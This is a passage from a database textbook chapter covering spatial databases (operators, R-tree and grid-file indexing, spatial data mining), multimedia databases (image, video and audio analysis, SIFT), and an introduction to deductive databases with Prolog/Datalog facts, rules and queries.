spatial database can in general refer to an n-dimensional space for any n, we will
limit our discussion to two dimensions as an illustration.

A spatial database is optimized to store and query data related to objects in space,
including points, lines and polygons. Satellite images are a prominent example of
spatial data. Queries posed on these spatial data, where predicates for selection deal
with spatial parameters, are called spatial queries. For example, “What are the
names of all bookstores within five miles of the College of Computing building at
Georgia Tech?” is a spatial query. Whereas typical databases process numeric and
character data, additional functionality needs to be added for databases to process
spatial data types. A query such as “List all the customers located within twenty
miles of company headquarters” will require the processing of spatial data types
typically outside the scope of standard relational algebra and may involve consult-
ing an external geographic database that maps the company headquarters and each
customer to a 2-D map based on their address. Effectively, each customer will be
associated to a position. A traditional B+-tree index based on
customers’ zip codes or other nonspatial attributes cannot be used to process this
query since traditional indexes are not capable of ordering multidimensional coor-
dinate data. Therefore, there is a special need for databases tailored for handling
spatial data and spatial queries.

Table 1 shows the common analytical operations involved in processing geographic
or spatial data.25 Measurement operations are used to measure some global prop-

25List of GIS analysis operations as proposed in Albrecht (1996).

956

Enhanced Data Models for Advanced Applications

erties of single objects (such as the area, the relative size of an object’s parts, com-
pactness, or symmetry), and to measure the relative position of different objects in
terms of distance and direction. Spatial analysis operations, which often use statis-
tical techniques, are used to uncover spatial relationships within and among mapped
data layers. An example would be to create a map—known as a prediction map—
that identifies the locations of likely customers for particular products based on the
historical sales and demographic information. Flow analysis operations help in
determining the shortest path between two points and also the connectivity among
nodes or regions in a graph. Location analysis aims to find if the given set of points
and lines lie within a given polygon (location). The process involves generating a
buffer around existing geographic features and then identifying or selecting features
based on whether they fall inside or outside the boundary of the buffer. Digital ter-
rain analysis is used to build three-dimensional models, where the topography of a
geographical location can be represented with an x, y, z data model known as Digital
Terrain (or Elevation) Model (DTM/DEM). The x and y dimensions of a DTM rep-
resent the horizontal plane, and z represents spot heights for the respective x, y coor-
dinates. Such models can be used for analysis of environmental data or during the
design of engineering projects that require terrain information. Spatial search
allows a user to search for objects within a particular spatial region. For example,
thematic search allows us to search for objects related to a particular theme or class,
such as “Find all water bodies within 25 miles of Atlanta” where the class is water.

There are also topological relationships among spatial objects. These are often used
in Boolean predicates to select objects based on their spatial relationships. For
example, if a city boundary is represented as a polygon and freeways are represented
as multilines, a condition such as “Find all freeways that go through Arlington,
Texas” would involve an intersects operation, to determine which freeways (lines)
intersect the city boundary (polygon).

3.2 Spatial Data Types and Models
This section briefly describes the common data types and models for storing spatial
data. Spatial data comes in three basic forms. These forms have become a de facto
standard due to their wide use in commercial systems.

■ Map Data26 includes various geographic or spatial features of objects in a
map, such as an object’s shape and the location of the object within the map.
The three basic types of features are points, lines, and polygons (or areas).
Points are used to represent spatial characteristics of objects whose locations
correspond to a single 2-d coordinate (x, y, or longitude/latitude) in the scale
of a particular application. Depending on the scale, some examples of point
objects could be buildings, cellular towers, or stationary vehicles. Moving

26These types of geographic data are based on ESRI’s guide to GIS. See
www.gis.com/implementing_gis/data/data_types.html

957

Enhanced Data Models for Advanced Applications

vehicles and other moving objects can be represented by a sequence of point
locations that change over time. Lines represent objects having length, such
as roads or rivers, whose spatial characteristics can be approximated by a
sequence of connected lines. Polygons are used to represent spatial charac-
teristics of objects that have a boundary, such as countries, states, lakes, or
cities. Notice that some objects, such as buildings or cities, can be repre-
sented as either points or polygons, depending on the scale of detail.

■ Attribute data is the descriptive data that GIS systems associate with map
features. For example, suppose that a map contains features that represent
counties within a US state (such as Texas or Oregon). Attributes for each
county feature (object) could include population, largest city/town, area in
square miles, and so on. Other attribute data could be included for other fea-
tures in the map, such as states, cities, congressional districts, census tracts,
and so on.

■ Image data includes data such as satellite images and aerial photographs,
which are typically created by cameras. Objects of interest, such as buildings
and roads, can be identified and overlaid on these images. Images can also be
attributes of map features. One can add images to other map features so that
clicking on the feature would display the image. Aerial and satellite images
are typical examples of raster data.

Models of spatial information are sometimes grouped into two broad categories:
field and object. A spatial application (such as remote sensing or highway traffic con-
trol) is modeled using either a field- or an object-based model, depending on the
requirements and the traditional choice of model for the application. Field models
are often used to model spatial data that is continuous in nature, such as terrain ele-
vation, temperature data, and soil variation characteristics, whereas object models
have traditionally been used for applications such as transportation networks, land
parcels, buildings, and other objects that possess both spatial and non-spatial attrib-
utes.

3.3 Spatial Operators
Spatial operators are used to capture all the relevant geometric properties of objects
embedded in the physical space and the relations between them, as well as to
perform spatial analysis. Operators are classified into three broad categories.

■ Topological operators. Topological properties are invariant when topologi-
cal transformations are applied. These properties do not change after trans-
formations like rotation, translation, or scaling. Topological operators are
hierarchically structured in several levels, where the base level offers opera-
tors the ability to check for detailed topological relations between regions
with a broad boundary, and the higher levels offer more abstract operators
that allow users to query uncertain spatial data independent of the underly-
ing geometric data model. Examples include open (region), close (region),
and inside (point, loop).

958

Enhanced Data Models for Advanced Applications

■ Projective operators. Projective operators, such as convex hull, are used to
express predicates about the concavity/convexity of objects as well as other
spatial relations (for example, being inside the concavity of a given object).

■ Metric operators. Metric operators provide a more specific description of
the object’s geometry. They are used to measure some global properties of
single objects (such as the area, relative size of an object’s parts, compactness,
and symmetry), and to measure the relative position of different objects in
terms of distance and direction. Examples include length (arc) and distance
(point, point).

Dynamic Spatial Operators. The operations performed by the operators men-
tioned above are static, in the sense that the operands are not affected by the appli-
cation of the operation. For example, calculating the length of the curve has no
effect on the curve itself. Dynamic operations alter the objects upon which the
operations act. The three fundamental dynamic operations are create, destroy, and
update. A representative example of dynamic operations would be updating a spa-
tial object that can be subdivided into translate (shift position), rotate (change ori-
entation), scale up or down, reflect (produce a mirror image), and shear (deform).

Spatial Queries. Spatial queries are requests for spatial data that require the use
of spatial operations. The following categories illustrate three typical types of spatial
queries:

■ Range query. Finds the objects of a particular type that are within a given
spatial area or within a particular distance from a given location. (For exam-
ple, find all hospitals within the Metropolitan Atlanta city area, or find all
ambulances within five miles of an accident location.)

■ Nearest neighbor query. Finds an object of a particular type that is closest to
a given location. (For example, find the police car that is closest to the loca-
tion of crime.)

■ Spatial joins or overlays. Typically joins the objects of two types based on
some spatial condition, such as the objects intersecting or overlapping spa-
tially or being within a certain distance of one another. (For example, find all
townships located on a major highway between two cities or find all homes
that are within two miles of a lake.)

3.4 Spatial Data Indexing
A spatial index is used to organize objects into a set of buckets (which correspond

to pages of secondary memory), so that objects in a particular spatial region can be
easily located. Each bucket has a bucket region, a part of space containing all objects
stored in the bucket. The bucket regions are usually rectangles; for point data struc-
tures, these regions are disjoint and they partition the space so that each point
belongs to precisely one bucket. There are essentially two ways of providing a spatial
index.

959

Enhanced Data Models for Advanced Applications

1. Specialized indexing structures that allow efficient search for data objects
based on spatial search operations are included in the database system. These
indexing structures would play a similar role to that performed by B+-tree
indexes in traditional database systems. Examples of these indexing struc-
tures are grid files and R-trees. Special types of spatial indexes, known as
spatial join indexes, can be used to speed up spatial join operations.

2. Instead of creating brand new indexing structures, the two-dimensional
(2-d) spatial data is converted to single-dimensional (1-d) data, so that tra-
ditional indexing techniques (B+-tree) can be used. The algorithms
for converting from 2-d to 1-d are known as space filling curves. We will
not discuss these methods in detail (see the Selected Bibliography for further
references).

We give an overview of some of the spatial indexing techniques next.

Grid Files. Grid files are used for indexing of data on multiple attributes. They can
also be used for indexing 2-dimensional and higher n-dimensional spatial data. The
fixed-grid method divides an n-dimensional hyperspace into equal size buckets.
The data structure that implements the fixed grid is an n-dimensional array. The
objects whose spatial locations lie within a cell (totally or partially) can be stored in
a dynamic structure to handle overflows. This structure is useful for uniformly dis-
tributed data like satellite imagery. However, the fixed-grid structure is rigid, and its
directory can be sparse and large.

R-Trees. The R-tree is a height-balanced tree, which is an extension of the B+-tree
for k-dimensions, where k > 1. For two dimensions (2-d), spatial objects are approx-
imated in the R-tree by their minimum bounding rectangle (MBR), which is the
smallest rectangle, with sides parallel to the coordinate system (x and y) axis, that
contains the object. R-trees are characterized by the following properties, which are
similar to the properties for B+-trees but are adapted to 2-d spatial objects. We use
M to indicate the maximum number of entries that can fit in an R-tree node.

1. The structure of each index entry (or index record) in a leaf node is (I,
object-identifier), where I is the MBR for the spatial object whose identifier is
object-identifier.

2. Every node except the root node must be at least half full. Thus, a leaf node
that is not the root should contain m entries (I, object-identifier) where M/2
<= m <= M. Similarly, a non-leaf node that is not the root should contain m entries (I, child-pointer) where M/2 <= m <= M, and I is the MBR that con- tains the union of all the rectangles in the node pointed at by child-pointer. 3. All leaf nodes are at the same level, and the root node should have at least two pointers unless it is a leaf node. 4. All MBRs have their sides parallel to the axes of the global coordinate system. 960 Enhanced Data Models for Advanced Applications Other spatial storage structures include quadtrees and their variations. Quadtrees generally divide each space or subspace into equally sized areas, and proceed with the subdivisions of each subspace to identify the positions of various objects. Recently, many newer spatial access structures have been proposed, and this area remains an active research area. Spatial Join Index. A spatial join index precomputes a spatial join operation and stores the pointers to the related object in an index structure. Join indexes improve the performance of recurring join queries over tables that have low update rates. Spatial join conditions are used to answer queries such as “Create a list of highway- river combinations that cross.” The spatial join is used to identify and retrieve these pairs of objects that satisfy the cross spatial relationship. Because computing the results of spatial relationships is generally time consuming, the result can be com- puted once and stored in a table that has the pairs of object identifiers (or tuple ids) that satisfy the spatial relationship, which is essentially the join index. A join index can be described by a bipartite graph G = (V1,V2,E), where V1 con- tains the tuple ids of relation R, and V2 contains the tuple ids of relation S. Edge set contains an edge (vr,vs) for vr in R and vs in S, if there is a tuple corresponding to (vr,vs) in the join index. The bipartite graph models all of the related tuples as con- nected vertices in the graphs. Spatial join indexes are used in operations (see Section 3.3) that involve computation of relationships among spatial objects. 3.5 Spatial Data Mining Spatial data tends to be highly correlated. For example, people with similar charac- teristics, occupations, and backgrounds tend to cluster together in the same neigh- borhoods. The three major spatial data mining techniques are spatial classification, spatial association, and spatial clustering. ■ Spatial classification. The goal of classification is to estimate the value of an attribute of a relation based on the value of the relation’s other attributes. An example of the spatial classification problem is determining the locations of nests in a wetland based on the value of other attributes (for example, vege- tation durability and water depth); it is also called the location prediction problem. Similarly, where to expect hotspots in crime activity is also a loca- tion prediction problem. ■ Spatial association. Spatial association rules are defined in terms of spatial predicates rather than items. A spatial association rule is of the form P1 ^ P2 ^ ... ^ Pn ⇒ Q1 ^ Q2 ^ ... ^ Qm, where at least one of the Pi’s or Q j’s is a spatial predicate. For example, the rule is_a(x, country) ^ touches(x, Mediterranean) ⇒ is_a (x, wine-exporter) 961 Enhanced Data Models for Advanced Applications (that is, a country that is adjacent to the Mediterranean Sea is typically a wine exporter) is an example of an association rule, which will have a certain support s and confidence c.27 Spatial colocation rules attempt to generalize association rules to point to collec- tion data sets that are indexed by space. There are several crucial differences between spatial and nonspatial associations including: 1. The notion of a transaction is absent in spatial situations, since data is embedded in continuous space. Partitioning space into transactions would lead to an overestimate or an underestimate of interest measures, for exam- ple, support or confidence. 2. Size of item sets in spatial databases is small, that is, there are many fewer items in the item set in a spatial situation than in a nonspatial situation. In most instances, spatial items are a discrete version of continuous variables. For example, in the United States income regions may be defined as regions where the mean yearly income is within certain ranges, such as, below $40,000, from $40,000 to $100,000, and above $100,000. ■ Spatial Clustering attempts to group database objects so that the most sim- ilar objects are in the same cluster, and objects in different clusters are as dis- similar as possible. One application of spatial clustering is to group together seismic events in order to determine earthquake faults. An example of a spa- tial clustering algorithm is density-based clustering, which tries to find clusters based on the density of data points in a region. These algorithms treat clusters as dense regions of objects in the data space. Two variations of these algorithms are density-based spatial clustering of applications with noise (DBSCAN)28 and density-based clustering (DENCLUE).29 DBSCAN is a density-based clustering algorithm because it finds a number of clusters starting from the estimated density distribution of corresponding nodes. 3.6 Applications of Spatial Data Spatial data management is useful in many disciplines, including geography, remote sensing, urban planning, and natural resource management. Spatial database man- agement is playing an important role in the solution of challenging scientific prob- lems such as global climate change and genomics. Due to the spatial nature of genome data, GIS and spatial database management systems have a large role to play in the area of bioinformatics. Some of the typical applications include pattern recognition (for example, to check if the topology of a particular gene in the genome is found in any other sequence feature map in the database), genome 27Concepts of support and confidence for association rules are often discussed as part of data mining. 28DBSCAN was proposed by Martin Ester, Hans-Peter Kriegel, Jörg Sander, and Xiaowei Xu (1996). 29DENCLUE was proposed by Hinnenberg and Gabriel (2007). 962 Enhanced Data Models for Advanced Applications browser development, and visualization maps. Another important application area of spatial data mining is the spatial outlier detection. A spatial outlier is a spatially referenced object whose nonspatial attribute values are significantly different from those of other spatially referenced objects in its spatial neighborhood. For example, if a neighborhood of older houses has just one brand-new house, that house would be an outlier based on the nonspatial attribute ‘house_age’. Detecting spatial outliers is useful in many applications of geographic information systems and spatial data- bases. These application domains include transportation, ecology, public safety, public health, climatology, and location-based services. 4 Multimedia Database Concepts Multimedia databases provide features that allow users to store and query different types of multimedia information, which includes images (such as photos or draw- ings), video clips (such as movies, newsreels, or home videos), audio clips (such as songs, phone messages, or speeches), and documents (such as books or articles). The main types of database queries that are needed involve locating multimedia sources that contain certain objects of interest. For example, one may want to locate all video clips in a video database that include a certain person, say Michael Jackson. One may also want to retrieve video clips based on certain activities included in them, such as video clips where a soccer goal is scored by a certain player or team. The above types of queries are referred to as content-based retrieval, because the multimedia source is being retrieved based on its containing certain objects or activities. Hence, a multimedia database must use some model to organize and index the multimedia sources based on their contents. Identifying the contents of multimedia sources is a difficult and time-consuming task. There are two main approaches. The first is based on automatic analysis of the multimedia sources to identify certain mathematical characteristics of their contents. This approach uses different techniques depending on the type of multimedia source (image, video, audio, or text). The second approach depends on manual identification of the objects and activities of interest in each multimedia source and on using this infor- mation to index the sources. This approach can be applied to all multimedia sources, but it requires a manual preprocessing phase where a person has to scan each multimedia source to identify and catalog the objects and activities it contains so that they can be used to index the sources. In the first part of this section, we will briefly discuss some of the characteristics of each type of multimedia source—images, video, audio, and text/documents. Then we will discuss approaches for automatic analysis of images followed by the prob- lem of object recognition in images. We end this section with some remarks on ana- lyzing audio sources. An image is typically stored either in raw form as a set of pixel or cell values, or in compressed form to save space. The image shape descriptor describes the geometric shape of the raw image, which is typically a rectangle of cells of a certain width and height. Hence, each image can be represented by an m by n grid of cells. Each cell 963 Enhanced Data Models for Advanced Applications contains a pixel value that describes the cell content. In black-and-white images, pixels can be one bit. In gray scale or color images, a pixel is multiple bits. Because images may require large amounts of space, they are often stored in compressed form. Compression standards, such as GIF, JPEG, or MPEG, use various mathemat- ical transformations to reduce the number of cells stored but still maintain the main image characteristics. Applicable mathematical transforms include Discrete Fourier Transform (DFT), Discrete Cosine Transform (DCT), and wavelet transforms. To identify objects of interest in an image, the image is typically divided into homo- geneous segments using a homogeneity predicate. For example, in a color image, adja- cent cells that have similar pixel values are grouped into a segment. The homogeneity predicate defines conditions for automatically grouping those cells. Segmentation and compression can hence identify the main characteristics of an image. A typical image database query would be to find images in the database that are similar to a given image. The given image could be an isolated segment that con- tains, say, a pattern of interest, and the query is to locate other images that contain that same pattern. There are two main techniques for this type of search. The first approach uses a distance function to compare the given image with the stored images and their segments. If the distance value returned is small, the probability of a match is high. Indexes can be created to group stored images that are close in the distance metric so as to limit the search space. The second approach, called the transformation approach, measures image similarity by having a small number of transformations that can change one image’s cells to match the other image. Transformations include rotations, translations, and scaling. Although the transfor- mation approach is more general, it is also more time-consuming and difficult. A video source is typically represented as a sequence of frames, where each frame is a still image. However, rather than identifying the objects and activities in every individual frame, the video is divided into video segments, where each segment comprises a sequence of contiguous frames that includes the same objects/activities. Each segment is identified by its starting and ending frames. The objects and activi- ties identified in each video segment can be used to index the segments. An index- ing technique called frame segment trees has been proposed for video indexing. The index includes both objects, such as persons, houses, and cars, as well as activities, such as a person delivering a speech or two people talking. Videos are also often compressed using standards such as MPEG. Audio sources include stored recorded messages, such as speeches, class presenta- tions, or even surveillance recordings of phone messages or conversations by law enforcement. Here, discrete transforms can be used to identify the main character- istics of a certain person’s voice in order to have similarity-based indexing and retrieval. We will briefly comment on their analysis in Section 4.4. A text/document source is basically the full text of some article, book, or magazine. These sources are typically indexed by identifying the keywords that appear in the text and their relative frequencies. However, filler words or common words called stopwords are eliminated from the process. Because there can be many keywords 964 Enhanced Data Models for Advanced Applications when attempting to index a collection of documents, techniques have been devel- oped to reduce the number of keywords to those that are most relevant to the col- lection. A dimensionality reduction technique called singular value decompositions (SVD), which is based on matrix transformations, can be used for this purpose. An indexing technique called telescoping vector trees (TV-trees), can then be used to group similar documents. 4.1 Automatic Analysis of Images Analysis of multimedia sources is critical to support any type of query or search interface. We need to represent multimedia source data such as images in terms of features that would enable us to define similarity. The work done so far in this area uses low-level visual features such as color, texture, and shape, which are directly related to the perceptual aspects of image content. These features are easy to extract and represent, and it is convenient to design similarity measures based on their sta- tistical properties. Color is one of the most widely used visual features in content-based image retrieval since it does not depend upon image size or orientation. Retrieval based on color similarity is mainly done by computing a color histogram for each image that identifies the proportion of pixels within an image for the three color channels (red, green, blue—RGB). However, RGB representation is affected by the orientation of the object with respect to illumination and camera direction. Therefore, current image retrieval techniques compute color histograms using competing invariant representations such as HSV (hue, saturation, value). HSV describes colors as points in a cylinder whose central axis ranges from black at the bottom to white at the top with neutral colors between them. The angle around the axis corresponds to the hue, the distance from the axis corresponds to the saturation, and the distance along the axis corresponds to the value (brightness). Texture refers to the patterns in an image that present the properties of homogene- ity that do not result from the presence of a single color or intensity value. Examples of texture classes are rough and silky. Examples of textures that can be identified include pressed calf leather, straw matting, cotton canvas, and so on. Just as pictures are represented by arrays of pixels (picture elements), textures are repre- sented by arrays of texels (texture elements). These textures are then placed into a number of sets, depending on how many textures are identified in the image. These sets not only contain the texture definition but also indicate where in the image the texture is located. Texture identification is primarily done by modeling it as a two- dimensional, gray-level variation. The relative brightness of pairs of pixels is com- puted to estimate the degree of contrast, regularity, coarseness, and directionality. Shape refers to the shape of a region within an image. It is generally determined by applying segmentation or edge detection to an image. Segmentation is a region- based approach that uses an entire region (sets of pixels), whereas edge detection is a boundary-based approach that uses only the outer boundary characteristics of entities. Shape representation is typically required to be invariant to translation, 965 Enhanced Data Models for Advanced Applications rotation, and scaling. Some well-known methods for shape representation include Fourier descriptors and moment invariants. 4.2 Object Recognition in Images Object recognition is the task of identifying real-world objects in an image or a video sequence. The system must be able to identify the object even when the images of the object vary in viewpoints, size, scale, or even when they are rotated or translated. Some approaches have been developed to divide the original image into regions based on similarity of contiguous pixels. Thus, in a given image showing a tiger in the jungle, a tiger subimage may be detected against the background of the jungle, and when compared with a set of training images, it may be tagged as a tiger. The representation of the multimedia object in an object model is extremely impor- tant. One approach is to divide the image into homogeneous segments using a homogeneous predicate. For example, in a colored image, adjacent cells that have similar pixel values are grouped into a segment. The homogeneity predicate defines conditions for automatically grouping those cells. Segmentation and compression can hence identify the main characteristics of an image. Another approach finds measurements of the object that are invariant to transformations. It is impossible to keep a database of examples of all the different transformations of an image. To deal with this, object recognition approaches find interesting points (or features) in an image that are invariant to transformations. An important contribution to this field was made by Lowe,30 who used scale- invariant features from images to perform reliable object recognition. This approach is called scale-invariant feature transform (SIFT). The SIFT features are invariant to image scaling and rotation, and partially invariant to change in illumi- nation and 3D camera viewpoint. They are well localized in both the spatial and frequency domains, reducing the probability of disruption by occlusion, clutter, or noise. In addition, the features are highly distinctive, which allows a single feature to be correctly matched with high probability against a large database of features, providing a basis for object and scene recognition. For image matching and recognition, SIFT features (also known as keypoint features) are first extracted from a set of reference images and stored in a database. Object recognition is then performed by comparing each feature from the new image with the features stored in the database and finding candidate matching fea- tures based on the Euclidean distance of their feature vectors. Since the keypoint features are highly distinctive, a single feature can be correctly matched with good probability in a large database of features. In addition to SIFT, there are a number of competing methods available for object recognition under clutter or partial occlusion. For example, RIFT, a rotation invari- ant generalization of SIFT, identifies groups of local affine regions (image features 30See Lowe (2004), “Distinctive Image Features from Scale-Invariant Keypoints.” 966 Enhanced Data Models for Advanced Applications having a characteristic appearance and elliptical shape) that remain approximately affinely rigid across a range of views of an object, and across multiple instances of the same object class. 4.3 Semantic Tagging of Images The notion of implicit tagging is an important one for image recognition and com- parison. Multiple tags may attach to an image or a subimage: for instance, in the example we referred to above, tags such as “tiger,” “jungle,” “green,” and “stripes” may be associated with that image. Most image search techniques retrieve images based on user-supplied tags that are often not very accurate or comprehensive. To improve search quality, a number of recent systems aim at automated generation of these image tags. In case of multimedia data, most of its semantics is present in its content. These systems use image-processing and statistical-modeling techniques to analyze image content to generate accurate annotation tags that can then be used to retrieve images by content. Since different annotation schemes will use different vocabularies to annotate images, the quality of image retrieval will be poor. To solve this problem, recent research techniques have proposed the use of concept hierar- chies, taxonomies, or ontologies using OWL (Web Ontology Language), in which terms and their relationships are clearly defined. These can be used to infer higher- level concepts based on tags. Concepts like “sky” and “grass” may be further divided into “clear sky” and “cloudy sky” or “dry grass” and “green grass” in such a taxon- omy. These approaches generally come under semantic tagging and can be used in conjunction with the above feature-analysis and object-identification strategies. 4.4 Analysis of Audio Data Sources Audio sources are broadly classified into speech, music, and other audio data. Each of these are significantly different from the other, hence different types of audio data are treated differently. Audio data must be digitized before it can be processed and stored. Indexing and retrieval of audio data is arguably the toughest among all types of media, because like video, it is continuous in time and does not have easily mea- surable characteristics such as text. Clarity of sound recordings is easy to perceive humanly but is hard to quantify for machine learning. Interestingly, speech data often uses speech recognition techniques to aid the actual audio content, as this can make indexing this data a lot easier and more accurate. This is sometimes referred to as text-based indexing of audio data. The speech metadata is typically content dependent, in that the metadata is generated from the audio content, for example, the length of the speech, the number of speakers, and so on. However, some of the metadata might be independent of the actual content, such as the length of the speech and the format in which the data is stored. Music indexing, on the other hand, is done based on the statistical analysis of the audio signal, also known as content-based indexing. Content-based indexing often makes use of the key features of sound: intensity, pitch, timbre, and rhythm. It is possible to compare different pieces of audio data and retrieve information from them based on the calculation of certain features, as well as application of certain transforms. 967 Enhanced Data Models for Advanced Applications 5 Introduction to Deductive Databases 5.1 Overview of Deductive Databases In a deductive database system we typically specify rules through a declarative lan- guage—a language in which we specify what to achieve rather than how to achieve it. An inference engine (or deduction mechanism) within the system can deduce new facts from the database by interpreting these rules. The model used for deduc- tive databases is closely related to the relational data model, and particularly to the domain relational calculus formalism. It is also related to the field of logic pro- gramming and the Prolog language. The deductive database work based on logic has used Prolog as a starting point. A variation of Prolog called Datalog is used to define rules declaratively in conjunction with an existing set of relations, which are themselves treated as literals in the language. Although the language structure of Datalog resembles that of Prolog, its operational semantics—that is, how a Datalog program is executed—is still different. A deductive database uses two main types of specifications: facts and rules. Facts are specified in a manner similar to the way relations are specified, except that it is not necessary to include the attribute names. Recall that a tuple in a relation describes some real-world fact whose meaning is partly determined by the attribute names. In a deductive database, the meaning of an attribute value in a tuple is determined solely by its position within the tuple. Rules are somewhat similar to relational views. They specify virtual relations that are not actually stored but that can be formed from the facts by applying inference mechanisms based on the rule specifi- cations. The main difference between rules and views is that rules may involve recursion and hence may yield virtual relations that cannot be defined in terms of basic relational views. The evaluation of Prolog programs is based on a technique called backward chain- ing, which involves a top-down evaluation of goals. In the deductive databases that use Datalog, attention has been devoted to handling large volumes of data stored in a relational database. Hence, evaluation techniques have been devised that resemble those for a bottom-up evaluation. Prolog suffers from the limitation that the order of specification of facts and rules is significant in evaluation; moreover, the order of literals (defined in Section 5.3) within a rule is significant. The execution techniques for Datalog programs attempt to circumvent these problems. 5.2 Prolog/Datalog Notation The notation used in Prolog/Datalog is based on providing predicates with unique names. A predicate has an implicit meaning, which is suggested by the predicate name, and a fixed number of arguments. If the arguments are all constant values, the predicate simply states that a certain fact is true. If, on the other hand, the pred- icate has variables as arguments, it is either considered as a query or as part of a rule or constraint. In our discussion, we adopt the Prolog convention that all constant 968 Enhanced Data Models for Advanced Applications Facts SUPERVISE(franklin, john). SUPERVISE(franklin, ramesh). SUPERVISE(franklin, joyce). SUPERVISE(jennifer, alicia). SUPERVISE(jennifer, ahmad). SUPERVISE(james, franklin). SUPERVISE(james, jennifer). . . . Rules SUPERIOR(X, Y ) :– SUPERVISE(X, Y ). SUPERIOR(X, Y ) :– SUPERVISE(X, Z ), SUPERIOR(Z, Y ). SUBORDINATE(X, Y ) :– SUPERIOR(Y, X ). Queries SUPERIOR(james, Y )? SUPERIOR(james, joyce)? joyceramesh franklin james(b)(a) john ahmad jennifer alicia Figure 11 (a) Prolog notation. (b) The supervisory tree. values in a predicate are either numeric or character strings; they are represented as identifiers (or names) that start with a lowercase letter, whereas variable names always start with an uppercase letter. Consider the example shown in Figure 11, which is based on the relational database in Figure A.1 (in Appendix: Figures at the end of this chapter), but in a much sim- plified form. There are three predicate names: supervise, superior, and subordinate. The SUPERVISE predicate is defined via a set of facts, each of which has two argu- ments: a supervisor name, followed by the name of a direct supervisee (subordinate) of that supervisor. These facts correspond to the actual data that is stored in the database, and they can be considered as constituting a set of tuples in a relation SUPERVISE with two attributes whose schema is SUPERVISE(Supervisor, Supervisee) Thus, SUPERVISE(X, Y ) states the fact that X supervises Y. Notice the omission of the attribute names in the Prolog notation. Attribute names are only represented by virtue of the position of each argument in a predicate: the first argument represents the supervisor, and the second argument represents a direct subordinate. The other two predicate names are defined by rules. The main contributions of deductive databases are the ability to specify recursive rules and to provide a frame- work for inferring new information based on the specified rules. A rule is of the form head :– body, where :– is read as if and only if. A rule usually has a single pred- icate to the left of the :– symbol—called the head or left-hand side (LHS) or conclusion of the rule—and one or more predicates to the right of the :– symbol— called the body or right-hand side (RHS) or premise(s) of the rule. A predicate with constants as arguments is said to be ground; we also refer to it as an instantiated predicate. The arguments of the predicates that appear in a rule typi- cally include a number of variable symbols, although predicates can also contain 969 Enhanced Data Models for Advanced Applications constants as arguments. A rule specifies that, if a particular assignment or binding of constant values to the variables in the body (RHS predicates) makes all the RHS predicates true, it also makes the head (LHS predicate) true by using the same assignment of constant values to variables. Hence, a rule provides us with a way of generating new facts that are instantiations of the head of the rule. These new facts are based on facts that already exist, corresponding to the instantiations (or bind- ings) of predicates in the body of the rule. Notice that by listing multiple predicates in the body of a rule we implicitly apply the logical AND operator to these predi- cates. Hence, the commas between the RHS predicates may be read as meaning and. Consider the definition of the predicate SUPERIOR in Figure 11, whose first argu- ment is an employee name and whose second argument is an employee who is either a direct or an indirect subordinate of the first employee. By indirect subordi- nate, we mean the subordinate of some subordinate down to any number of levels. Thus SUPERIOR(X, Y) stands for the fact that X is a superior of Y through direct or indirect supervision. We can write two rules that together specify the meaning of the new predicate. The first rule under Rules in the figure states that for every value of X and Y, if SUPERVISE(X, Y)—the rule body—is true, then SUPERIOR(X, Y)—the rule head—is also true, since Y would be a direct subordinate of X (at one level down). This rule can be used to generate all direct superior/subordinate relation- ships from the facts that define the SUPERVISE predicate. The second recursive rule states that if SUPERVISE(X, Z) and SUPERIOR(Z, Y ) are both true, then SUPERIOR(X, Y) is also true. This is an example of a recursive rule, where one of the rule body predicates in the RHS is the same as the rule head predicate in the LHS. In general, the rule body defines a number of premises such that if they are all true, we can deduce that the conclusion in the rule head is also true. Notice that if we have two (or more) rules with the same head (LHS predicate), it is equivalent to saying that the predicate is true (that is, that it can be instantiated) if either one of the bodies is true; hence, it is equivalent to a logical OR operation. For example, if we have two rules X :– Y and X :– Z, they are equivalent to a rule X :– Y OR Z. The latter form is not used in deductive systems, however, because it is not in the stan- dard form of rule, called a Horn clause, as we discuss in Section 5.4. A Prolog system contains a number of built-in predicates that the system can inter- pret directly. These typically include the equality comparison operator =(X, Y), which returns true if X and Y are identical and can also be written as X=Y by using the standard infix notation.31 Other comparison operators for numbers, such as <, <=, >, and >=, can be treated as binary predicates. Arithmetic functions such as +,
–, *, and / can be used as arguments in predicates in Prolog. In contrast, Datalog (in
its basic form) does not allow functions such as arithmetic operations as arguments;
indeed, this is one of the main differences between Prolog and Datalog. However,
extensions to Datalog have been proposed that do include functions.

31A Prolog system typically has a number of different equality predicates that have different interpreta-
tions.

970

Enhanced Data Models for Advanced Applications

A query typically involves a predicate symbol with some variable arguments, and its
meaning (or answer) is to deduce all the different constant combinations that, when
bound (assigned) to the variables, can make the predicate true. For example, the
first query in Figure 11 requests the names of all subordinates of james at any level.
A different type of query, which has only constant symbols as arguments, returns
either a true or a false result, depending on whether the arguments provided can be
deduced from the facts and rules. For example, the second query in Figure 11
returns true, since SUPERIOR(james, joyce) can be deduced.

5.3 Datalog Notation
In Datalog, as in other logic-based languages, a program is built from basic objects
called atomic formulas. It is customary to define the syntax of logic-based lan-
guages by describing the syntax of atomic formulas and identifying how they can be
combined to form a program. In Datalog, atomic formulas are literals of the form
p(a1, a2, …, an), where p is the predicate name and n is the number of arguments for
predicate p. Different predicate symbols can have different numbers of arguments,
and the number of arguments n of predicate p is sometimes called the arity or
degree of p. The arguments can be either constant values or variable names. As
mentioned earlier, we use the convention that constant values either are numeric or
start with a lowercase character, whereas variable names always start with an
uppercase character.

A number of built-in predicates are included in Datalog, which can also be used to
construct atomic formulas. The built-in predicates are of two main types: the binary
comparison predicates < (less), <= (less_or_equal), > (greater), and >=
(greater_or_equal) over ordered domains; and the comparison predicates = (equal)
and /= (not_equal) over ordered or unordered domains. These can be used as binary
predicates with the same functional syntax as other predicates—for example, by
writing less(X, 3)—or they can be specified by using the customary infix notation
